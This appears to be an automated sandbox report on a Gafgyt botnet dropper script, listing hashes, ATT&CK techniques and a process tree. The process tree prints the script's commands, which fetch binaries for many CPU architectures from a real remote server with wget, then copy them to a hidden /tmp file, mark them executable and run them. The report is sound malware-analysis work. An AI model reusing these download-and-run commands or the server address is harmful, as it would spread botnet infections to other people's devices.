Analysis
-
max time kernel
20s -
max time network
22s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
03-01-2025 07:13
Static task
static1
Behavioral task
behavioral1
Sample
shell.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
shell.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
shell.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
shell.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
shell.sh
-
Size
327B
-
MD5
be3860edd084c6394d9894627d926283
-
SHA1
0084acbf7a34fece5ee66fd63b64234d5d2238d8
-
SHA256
d1f89f4c630323b37a6f669903f2e617a0616052c4b900e33d0b9eb41084514f
-
SHA512
06440f218923e2062a940299d2386762eb228d87a5407430191733865e122a0cb4a5c076b07ff9b5547933b80653555cbfcfc4b7d31eedcc6f132372d6be105a
Malware Config
Extracted
gafgyt
127.0.0.1:80
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral4/files/fstream-6.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 752 chmod 770 chmod 778 chmod 812 chmod 851 chmod 796 chmod 834 chmod 845 chmod 717 chmod 739 chmod 746 chmod 758 chmod 764 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/.z 735 .z /tmp/.z 743 .z /tmp/.z 749 .z /tmp/.z 755 .z /tmp/.z 761 .z /tmp/.z 767 .z /tmp/.z 773 .z /tmp/.z 791 .z /tmp/.z 807 .z /tmp/.z 829 .z /tmp/.z 842 .z /tmp/.z 848 .z /tmp/.z 854 .z -
resource yara_rule behavioral4/files/fstream-2.dat upx behavioral4/files/fstream-3.dat upx behavioral4/files/fstream-4.dat upx behavioral4/files/fstream-5.dat upx -
description ioc Process File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 755 .z 747 rm 748 wget 749 .z 753 rm 754 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.z shell.sh
Processes
-
/tmp/shell.sh/tmp/shell.sh1⤵
- Writes file to tmp directory
PID:706 -
/bin/rmrm -rf .z2⤵PID:708
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:710
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:717
-
-
/bin/rmrm -rf x86_642⤵PID:720
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/x86_64 -O -2⤵PID:722
-
-
/tmp/.z./.z x86_642⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm -rf .z2⤵PID:736
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:737
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:739
-
-
/bin/rmrm -rf i5862⤵PID:740
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/i586 -O -2⤵PID:741
-
-
/tmp/.z./.z i5862⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm -rf .z2⤵PID:744
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:745
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:746
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:747
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/mips -O -2⤵
- System Network Configuration Discovery
PID:748
-
-
/tmp/.z./.z mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:749
-
-
/bin/rmrm -rf .z2⤵PID:750
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:751
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:752
-
-
/bin/rmrm -rf mipsel2⤵
- System Network Configuration Discovery
PID:753
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/mipsel -O -2⤵
- System Network Configuration Discovery
PID:754
-
-
/tmp/.z./.z mipsel2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:755
-
-
/bin/rmrm -rf .z2⤵PID:756
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:757
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:758
-
-
/bin/rmrm -rf armv4l2⤵PID:759
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/armv4l -O -2⤵PID:760
-
-
/tmp/.z./.z armv4l2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm -rf .z2⤵PID:762
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:763
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:764
-
-
/bin/rmrm -rf armv5l2⤵PID:765
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/armv5l -O -2⤵PID:766
-
-
/tmp/.z./.z armv5l2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm -rf .z2⤵PID:768
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:769
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:770
-
-
/bin/rmrm -rf armv6l2⤵PID:771
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/armv6l -O -2⤵PID:772
-
-
/tmp/.z./.z armv6l2⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm -rf .z2⤵PID:774
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:776
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:778
-
-
/bin/rmrm -rf armv7l2⤵PID:779
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/armv7l -O -2⤵PID:780
-
-
/tmp/.z./.z armv7l2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm -rf .z2⤵PID:792
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:793
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:796
-
-
/bin/rmrm -rf powerpc2⤵PID:797
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/powerpc -O -2⤵PID:799
-
-
/tmp/.z./.z powerpc2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm -rf .z2⤵PID:808
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:810
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:812
-
-
/bin/rmrm -rf sparc2⤵PID:813
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/sparc -O -2⤵PID:815
-
-
/tmp/.z./.z sparc2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm -rf .z2⤵PID:830
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:832
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:834
-
-
/bin/rmrm -rf m68k2⤵PID:836
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/m68k -O -2⤵PID:837
-
-
/tmp/.z./.z m68k2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm -rf .z2⤵PID:843
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:844
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:845
-
-
/bin/rmrm -rf i6862⤵PID:846
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/i686 -O -2⤵PID:847
-
-
/tmp/.z./.z i6862⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm -rf .z2⤵PID:849
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:850
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:851
-
-
/bin/rmrm -rf sh42⤵PID:852
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/sh4 -O -2⤵PID:853
-
-
/tmp/.z./.z sh42⤵
- Executes dropped EXE
PID:854
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
66KB
MD533127be57dc9ff0d1ef1f51e613c5517
SHA14fde704f7e241a2d760bad03f3e2fa7b3267f70d
SHA256b9cc82bf75b97d7d94783ac1b33da7e842180af893d930812b79c186956707f5
SHA5120f864972b44b689bfe4a4da70b5e94ea281f2acd43b26227bf68b13c4075422092454ebb4254fd66d3650362aad978ec271187c6cffeb74ff94a3e5ef091c348
-
Filesize
62KB
MD55c086f6372f862e1b7a7f8b9fb9fa431
SHA1d09655cca5a41dfdbdafa1245411445efbb72449
SHA25671a55da4de94d324669f43a83e14a5b20154fefdf03b1051bad2ae181f314676
SHA5123c3f06257e1638e3fa6ff33ba107c5a49cba56429e0e0ec5c551864044c003263557102f7f9d7b1151c8d24099d4f28124672e0510ebb5629f3e71434dc26e30
-
Filesize
66KB
MD582999462377666d1c50486d94b4160ad
SHA158c62d44ff09fa07fe3d214e27b96e504eb62728
SHA2560df50e6986da2c391072e5e135f807b263b98f7303796278e4d60fa39a161cfd
SHA512cecabe8ad74d0c57f546c86b01d26dadf0cc8b436a8a2b6fece78bd158156f2e1c5b2270ea8c44e7e6a2eca0e690b119abd05f33f099301782a5356c86602fe6
-
Filesize
67KB
MD582a0a8e54c823931b1d3c9f043a760c0
SHA1e67075c0cdc2451355c425502660e35b3f97d827
SHA2562b2d11f90643979799af9d1e234d21234f75beb37fec69cd09418e3600c15c44
SHA5123781540bc763ffbfd8e6065ac6fd057eeb18b77873e3cb80f310ea34acf7443c4c335d366e392c862ffdb5a07552232b208075035a42dd14f395772d00d65b78
-
Filesize
221KB
MD5ba3641a22b6c6002cf3c94474a74ecee
SHA1781190657e1a92bc448912a5ca394180434fa8f9
SHA2565e9fdee0284c4b67992c106331a58cb6759187466b72bacdfb0659bd4db6f294
SHA51293b3cb8b5b39f59cf303a07fabfd01361ef2724a28496290074f18ed9abbeadd817fcbc70438fdd68f34f3c3ead518a32a4a2ce3914b68952bcd9a32fd6770ad